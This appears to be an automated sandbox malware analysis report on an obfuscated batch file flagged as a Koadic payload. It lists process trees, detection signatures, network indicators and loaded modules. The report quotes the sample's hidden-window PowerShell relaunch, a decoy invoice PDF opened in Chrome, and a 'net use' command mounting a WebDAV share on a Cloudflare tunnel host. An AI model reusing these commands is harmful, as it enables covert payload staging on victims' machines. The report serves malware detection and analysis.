Edit tour

Windows Analysis Report
2h.bat

Overview

General Information

Sample name:2h.bat
Analysis ID:1647126
MD5:0110fbc81a42c9376f10dbe604491f77
SHA1:daf5f87aea0e57749d2951014d3dfdee9b57fa30
SHA256:ae8c6e7884ebe53f38a11df2b90c84bad4b4fa192dd361a58dc33db4fddb33d0
Tags:batWsgiDAVuser-JAMESWT_MHT
Infos:

Detection

Score:76
Range:0 - 100
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Gathers information about network shares
Joe Sandbox ML detected suspicious sample
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
DNS query to tunneling platform domain
Deletes files inside the Windows folder
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • cmd.exe (PID: 7972 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\2h.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8152 cmdline: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\2h.bat\" hidden' -WindowStyle Hidden" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5036 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\2h.bat" hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chrome.exe (PID: 1692 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf MD5: E81F54E6C1129887AEA47E7D092680BF)
          • chrome.exe (PID: 2404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1852,i,15914125147527683270,510566878733152321,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2060 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
        • net.exe (PID: 1424 cmdline: net use Z: "\\supplier-murray-custody-treasures.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • net.exe (PID: 4940 cmdline: net use Z: /delete /yes MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
2h.batMALWARE_BAT_KoadicBATKoadic post-exploitation framework BAT payloadditekSHen
  • 0x2:$s1: &@cls&@set
  • 0x58:$s2: :~16,1%%
  • 0x63:$s2: :~47,1%%
  • 0x6e:$s2: :~2,1%%
  • 0x78:$s2: :~4,1%%
  • 0x8b:$s2: :~62,1%
  • 0x99:$s2: :~23,1%%
  • 0xa4:$s2: :~53,1%%
  • 0xaf:$s2: :~57,1%
  • 0xbb:$s2: :~55,1%%
  • 0xc6:$s2: :~0,1%%
  • 0xd0:$s2: :~20,1%%
  • 0xdb:$s2: :~8,1%%
  • 0xe5:$s2: :~14,1%%
  • 0xf0:$s2: :~32,1%%
  • 0xfb:$s2: :~46,1%%
  • 0x106:$s2: :~4,1%%
  • 0x110:$s2: :~58,1%%
  • 0x11b:$s2: :~1,1%%
  • 0x125:$s2: :~51,1%%
  • 0x130:$s2: :~12,1%%

System Summary

barindex
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net use Z: "\\supplier-murray-custody-treasures.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no , CommandLine: net use Z: "\\supplier-murray-custody-treasures.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no , CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\2h.bat" hidden , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5036, ParentProcessName: cmd.exe, ProcessCommandLine: net use Z: "\\supplier-murray-custody-treasures.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no , ProcessId: 1424, ProcessName: net.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\2h.bat\" hidden' -WindowStyle Hidden", CommandLine: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\2h.bat\" hidden' -WindowStyle Hidden", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\2h.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7972, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\2h.bat\" hidden' -WindowStyle Hidden", ProcessId: 8152, ProcessName: powershell.exe
Source: Process startedAuthor: frack113: Data: Command: net use Z: "\\supplier-murray-custody-treasures.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no , CommandLine: net use Z: "\\supplier-murray-custody-treasures.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no , CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\2h.bat" hidden , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5036, ParentProcessName: cmd.exe, ProcessCommandLine: net use Z: "\\supplier-murray-custody-treasures.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no , ProcessId: 1424, ProcessName: net.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use Z: "\\supplier-murray-custody-treasures.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no , CommandLine: net use Z: "\\supplier-murray-custody-treasures.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no , CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\2h.bat" hidden , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5036, ParentProcessName: cmd.exe, ProcessCommandLine: net use Z: "\\supplier-murray-custody-treasures.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no , ProcessId: 1424, ProcessName: net.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-24T15:50:15.149265+010020283713Unknown Traffic192.168.2.449722104.16.231.132443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-24T15:50:15.942803+010018100051Potentially Bad Traffic192.168.2.449722104.16.231.132443TCP
2025-03-24T15:50:20.162097+010018100051Potentially Bad Traffic192.168.2.449733104.16.231.132443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 2h.batVirustotal: Detection: 11%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.6% probability
Source: unknownHTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.4:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.134.42:443 -> 192.168.2.4:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.40.196:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.40.196:443 -> 192.168.2.4:49740 version: TLS 1.2

Networking

barindex
Source: Network trafficSuricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.4:49733 -> 104.16.231.132:443
Source: Network trafficSuricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.4:49722 -> 104.16.231.132:443
Source: unknownDNS query to tunneling platform domain: name: supplier-murray-custody-treasures.trycloudflare.com
Source: Joe Sandbox ViewIP Address: 162.159.134.42 162.159.134.42
Source: Joe Sandbox ViewIP Address: 162.159.134.42 162.159.134.42
Source: Joe Sandbox ViewIP Address: 104.16.231.132 104.16.231.132
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49722 -> 104.16.231.132:443
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.64.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.64.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.64.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.64.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.64.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.64.99
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.64.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.64.99
Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficDNS traffic detected: DNS query: supplier-murray-custody-treasures.trycloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.healyconsultants.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 14:50:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 9256faf3384ec64a-EWRCF-Cache-Status: DYNAMICServer: cloudflare
Source: net.exe, 0000000C.00000002.1578721214.0000018794695000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000003.1536962933.00000187946AD000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000002.1578721214.00000187946C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://supplier-murray-custody-treasures.trycloudflare.com/
Source: net.exe, 0000000C.00000002.1578721214.0000018794659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://supplier-murray-custody-treasures.trycloudflare.com//
Source: net.exe, 0000000C.00000002.1578721214.00000187946C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://supplier-murray-custody-treasures.trycloudflare.com/K
Source: cmd.exe, 00000009.00000003.1581240038.0000017244463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.1582397233.0000017244472000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1580886036.0000017244463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1579656114.0000017244463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healyconsultants.com/wp-content/upl0W
Source: cmd.exe, 00000009.00000003.1581240038.0000017244463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.1582397233.0000017244409000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.1582397233.0000017244463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1579656114.0000017244408000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1580886036.0000017244463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1579656114.0000017244463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1581240038.0000017244407000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.1582397233.00000172443DC000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1580886036.0000017244408000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000002.1578652526.00000187945B4000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000002.1578721214.0000018794659000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000011.00000002.1580722369.000001332AE59000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000011.00000002.1580763388.000001332B0F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf
Source: cmd.exe, 00000009.00000003.1581000924.0000017244489000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1519588740.0000017244404000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1579656114.0000017244408000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1580886036.0000017244478000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1579656114.0000017244478000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1580886036.0000017244489000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1579632176.000001724448B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1523273437.000001724448C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1581186413.0000017244478000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1579778025.000001724447A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1581186413.0000017244489000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1580174687.000001724448B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1580886036.0000017244408000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000002.1578652526.00000187945B4000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000002.1578721214.0000018794650000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000011.00000002.1580722369.000001332AE50000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000011.00000002.1580763388.000001332B0F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfPROCESSOR_ARCHI
Source: cmd.exe, 00000009.00000002.1582397233.0000017244409000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1579656114.0000017244408000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1581240038.0000017244407000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1580886036.0000017244408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfVk
Source: cmd.exe, 00000009.00000002.1582397233.00000172443DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfr
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownHTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.4:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.134.42:443 -> 192.168.2.4:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.40.196:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.40.196:443 -> 192.168.2.4:49740 version: TLS 1.2

System Summary

barindex
Source: 2h.bat, type: SAMPLEMatched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir1692_1832859539Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir1692_1832859539Jump to behavior
Source: 2h.bat, type: SAMPLEMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
Source: classification engineClassification label: mal76.spyw.winBAT@30/4@9/4
Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Contacts\error_log.txtJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_khxdrv4d.0iw.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\2h.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: 2h.batVirustotal: Detection: 11%
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\2h.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\2h.bat\" hidden' -WindowStyle Hidden"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\2h.bat" hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use Z: "\\supplier-murray-custody-treasures.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1852,i,15914125147527683270,510566878733152321,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2060 /prefetch:3
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use Z: /delete /yes
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\2h.bat\" hidden' -WindowStyle Hidden"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\2h.bat" hidden Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use Z: "\\supplier-murray-custody-treasures.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use Z: /delete /yesJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1852,i,15914125147527683270,510566878733152321,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2060 /prefetch:3Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
